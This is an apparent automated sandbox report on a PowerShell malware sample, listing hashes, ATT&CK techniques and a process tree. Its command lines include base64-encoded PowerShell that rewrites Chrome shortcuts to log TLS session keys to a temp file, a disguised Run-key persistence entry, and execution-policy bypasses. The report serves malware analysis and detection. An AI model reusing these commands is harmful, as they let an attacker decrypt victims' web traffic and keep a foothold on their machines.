9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61

Resubmissions

25/04/2024, 08:25

240425-ka9p9aha9v 6

25/04/2024, 08:17

240425-j671vsha49 6

Analysis

max time kernel
135s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
25/04/2024, 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malicious.ps1
Size

41KB
MD5

b0eabea0c5a9d7805de694b90de4211a
SHA1

12363433de1259efd04ffa0cb569ad1874f68405
SHA256

9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61
SHA512

ac7f19224164c09b4ba80142a35eb68a26bac57e51108f511bff57713dfe1e1e0c512a95165a0dc1b2b951ad046fba6fafc4d535dccc93a1023615be36fd34db
SSDEEP

768:ww7zzQcwdAXDWAFQIkvqb+1wMm7hkmV5X0+KeFFLj4zb197:wwZXqAFlk8dMmVhV5hdjCZ97

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdateChecker = "powershell -ep Bypass -File C:\\Users\\Admin\\AppData\\Local\\Temp\\run.ps1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdateChecker = "powershell -ep Bypass -File C:\\Users\\Admin\\AppData\\Local\\Temp\\run.ps1"	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
5964	notepad.exe
1840	notepad.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4360	powershell.exe
4360	powershell.exe
1624	powershell.exe
1624	powershell.exe
4716	powershell.exe
4716	powershell.exe
3012	msedge.exe
3012	msedge.exe
4432	msedge.exe
4432	msedge.exe
1724	powershell.exe
1724	powershell.exe
1724	powershell.exe
6084	identity_helper.exe
6084	identity_helper.exe
5276	powershell.exe
5276	powershell.exe
5276	powershell.exe
3420	powershell.exe
3420	powershell.exe
3420	powershell.exe
5144	powershell.exe
5144	powershell.exe
5144	powershell.exe
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: 33	1856	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1856	AUDIODG.EXE
Token: SeDebugPrivilege	5276	powershell.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	5144	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe
4432	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4360 wrote to memory of 1624	4360	powershell.exe	90
PID 4360 wrote to memory of 1624	4360	powershell.exe	90
PID 4360 wrote to memory of 4716	4360	powershell.exe	91
PID 4360 wrote to memory of 4716	4360	powershell.exe	91
PID 4716 wrote to memory of 4432	4716	powershell.exe	94
PID 4716 wrote to memory of 4432	4716	powershell.exe	94
PID 4432 wrote to memory of 3596	4432	msedge.exe	95
PID 4432 wrote to memory of 3596	4432	msedge.exe	95
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 2828	4432	msedge.exe	97
PID 4432 wrote to memory of 3012	4432	msedge.exe	98
PID 4432 wrote to memory of 3012	4432	msedge.exe	98
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99
PID 4432 wrote to memory of 1908	4432	msedge.exe	99

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious.ps1
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand ZgBvAHIAZQBhAGMAaAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAIABpAG4AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAALQBJAG4AYwBsAHUAZABlACAAKgAuAGwAbgBrACkAewAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0AJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAKQA7AGkAZgAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAFQAYQByAGcAZQB0AFAAYQB0AGgAIAAtAG0AYQB0AGMAaAAgACcAYwBoAHIAbwBtAGUAXAAuAGUAeABlACQAJwApAHsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAC4AQQByAGcAdQBtAGUAbgB0AHMAPQAiAC0ALQBzAHMAbAAtAGsAZQB5AC0AbABvAGcALQBmAGkAbABlAD0AJABlAG4AdgA6AFQARQBNAFAAXABkAGUAZgBlAG4AZABlAHIALQByAGUAcwAuAHQAeAB0ACIAOwAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIALgBTAGEAdgBlACgAKQA7AH0AfQAKAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBhAHgAaQBtAGkAegBlAGQAIABoAHQAdABwAHMAOgAvAC8AaABlAGwAbABvAC4AcwBtAHkAbABlAHIALgBuAGUAdAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hello.smyler.net/
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd20b46f8,0x7ffcd20b4708,0x7ffcd20b4718
      4⤵
      PID:3596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
      4⤵
      PID:2828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
      4⤵
      PID:1908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
      4⤵
      PID:4808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
      4⤵
      PID:4572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
      4⤵
      PID:1080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
      4⤵
      PID:3740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5392 /prefetch:8
      4⤵
      PID:2536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5500 /prefetch:8
      4⤵
      PID:5292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 /prefetch:8
      4⤵
      PID:6068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
      4⤵
      PID:5480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
      4⤵
      PID:5328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
      4⤵
      PID:4196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
      4⤵
      PID:5032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
      4⤵
      PID:5152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
      4⤵
      PID:4596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,17129737954490151756,5763612024270787896,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
      4⤵
      PID:3908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2536

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8 0x394
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3420

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\run.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:5964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\run.ps1'"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5276

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\malicious.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\malicious.ps1'"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand ZgBvAHIAZQBhAGMAaAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAIABpAG4AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAALQBJAG4AYwBsAHUAZABlACAAKgAuAGwAbgBrACkAewAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0AJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAKQA7AGkAZgAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAFQAYQByAGcAZQB0AFAAYQB0AGgAIAAtAG0AYQB0AGMAaAAgACcAYwBoAHIAbwBtAGUAXAAuAGUAeABlACQAJwApAHsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAC4AQQByAGcAdQBtAGUAbgB0AHMAPQAiAC0ALQBzAHMAbAAtAGsAZQB5AC0AbABvAGcALQBmAGkAbABlAD0AJABlAG4AdgA6AFQARQBNAFAAXABkAGUAZgBlAG4AZABlAHIALQByAGUAcwAuAHQAeAB0ACIAOwAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIALgBTAGEAdgBlACgAKQA7AH0AfQAKAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBhAHgAaQBtAGkAegBlAGQAIABoAHQAdABwAHMAOgAvAC8AaABlAGwAbABvAC4AcwBtAHkAbABlAHIALgBuAGUAdAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hello.smyler.net/
    3⤵
    PID:6036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd20b46f8,0x7ffcd20b4708,0x7ffcd20b4718
      4⤵
      PID:5340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cb138796dbfb37877fcae3430bb1e2a7

SHA1
82bb82178c07530e42eca6caf3178d66527558bc

SHA256
50c55ba7baeebe1fa4573118edbca59010d659ea42761148618fb3af8a1c9bdd

SHA512
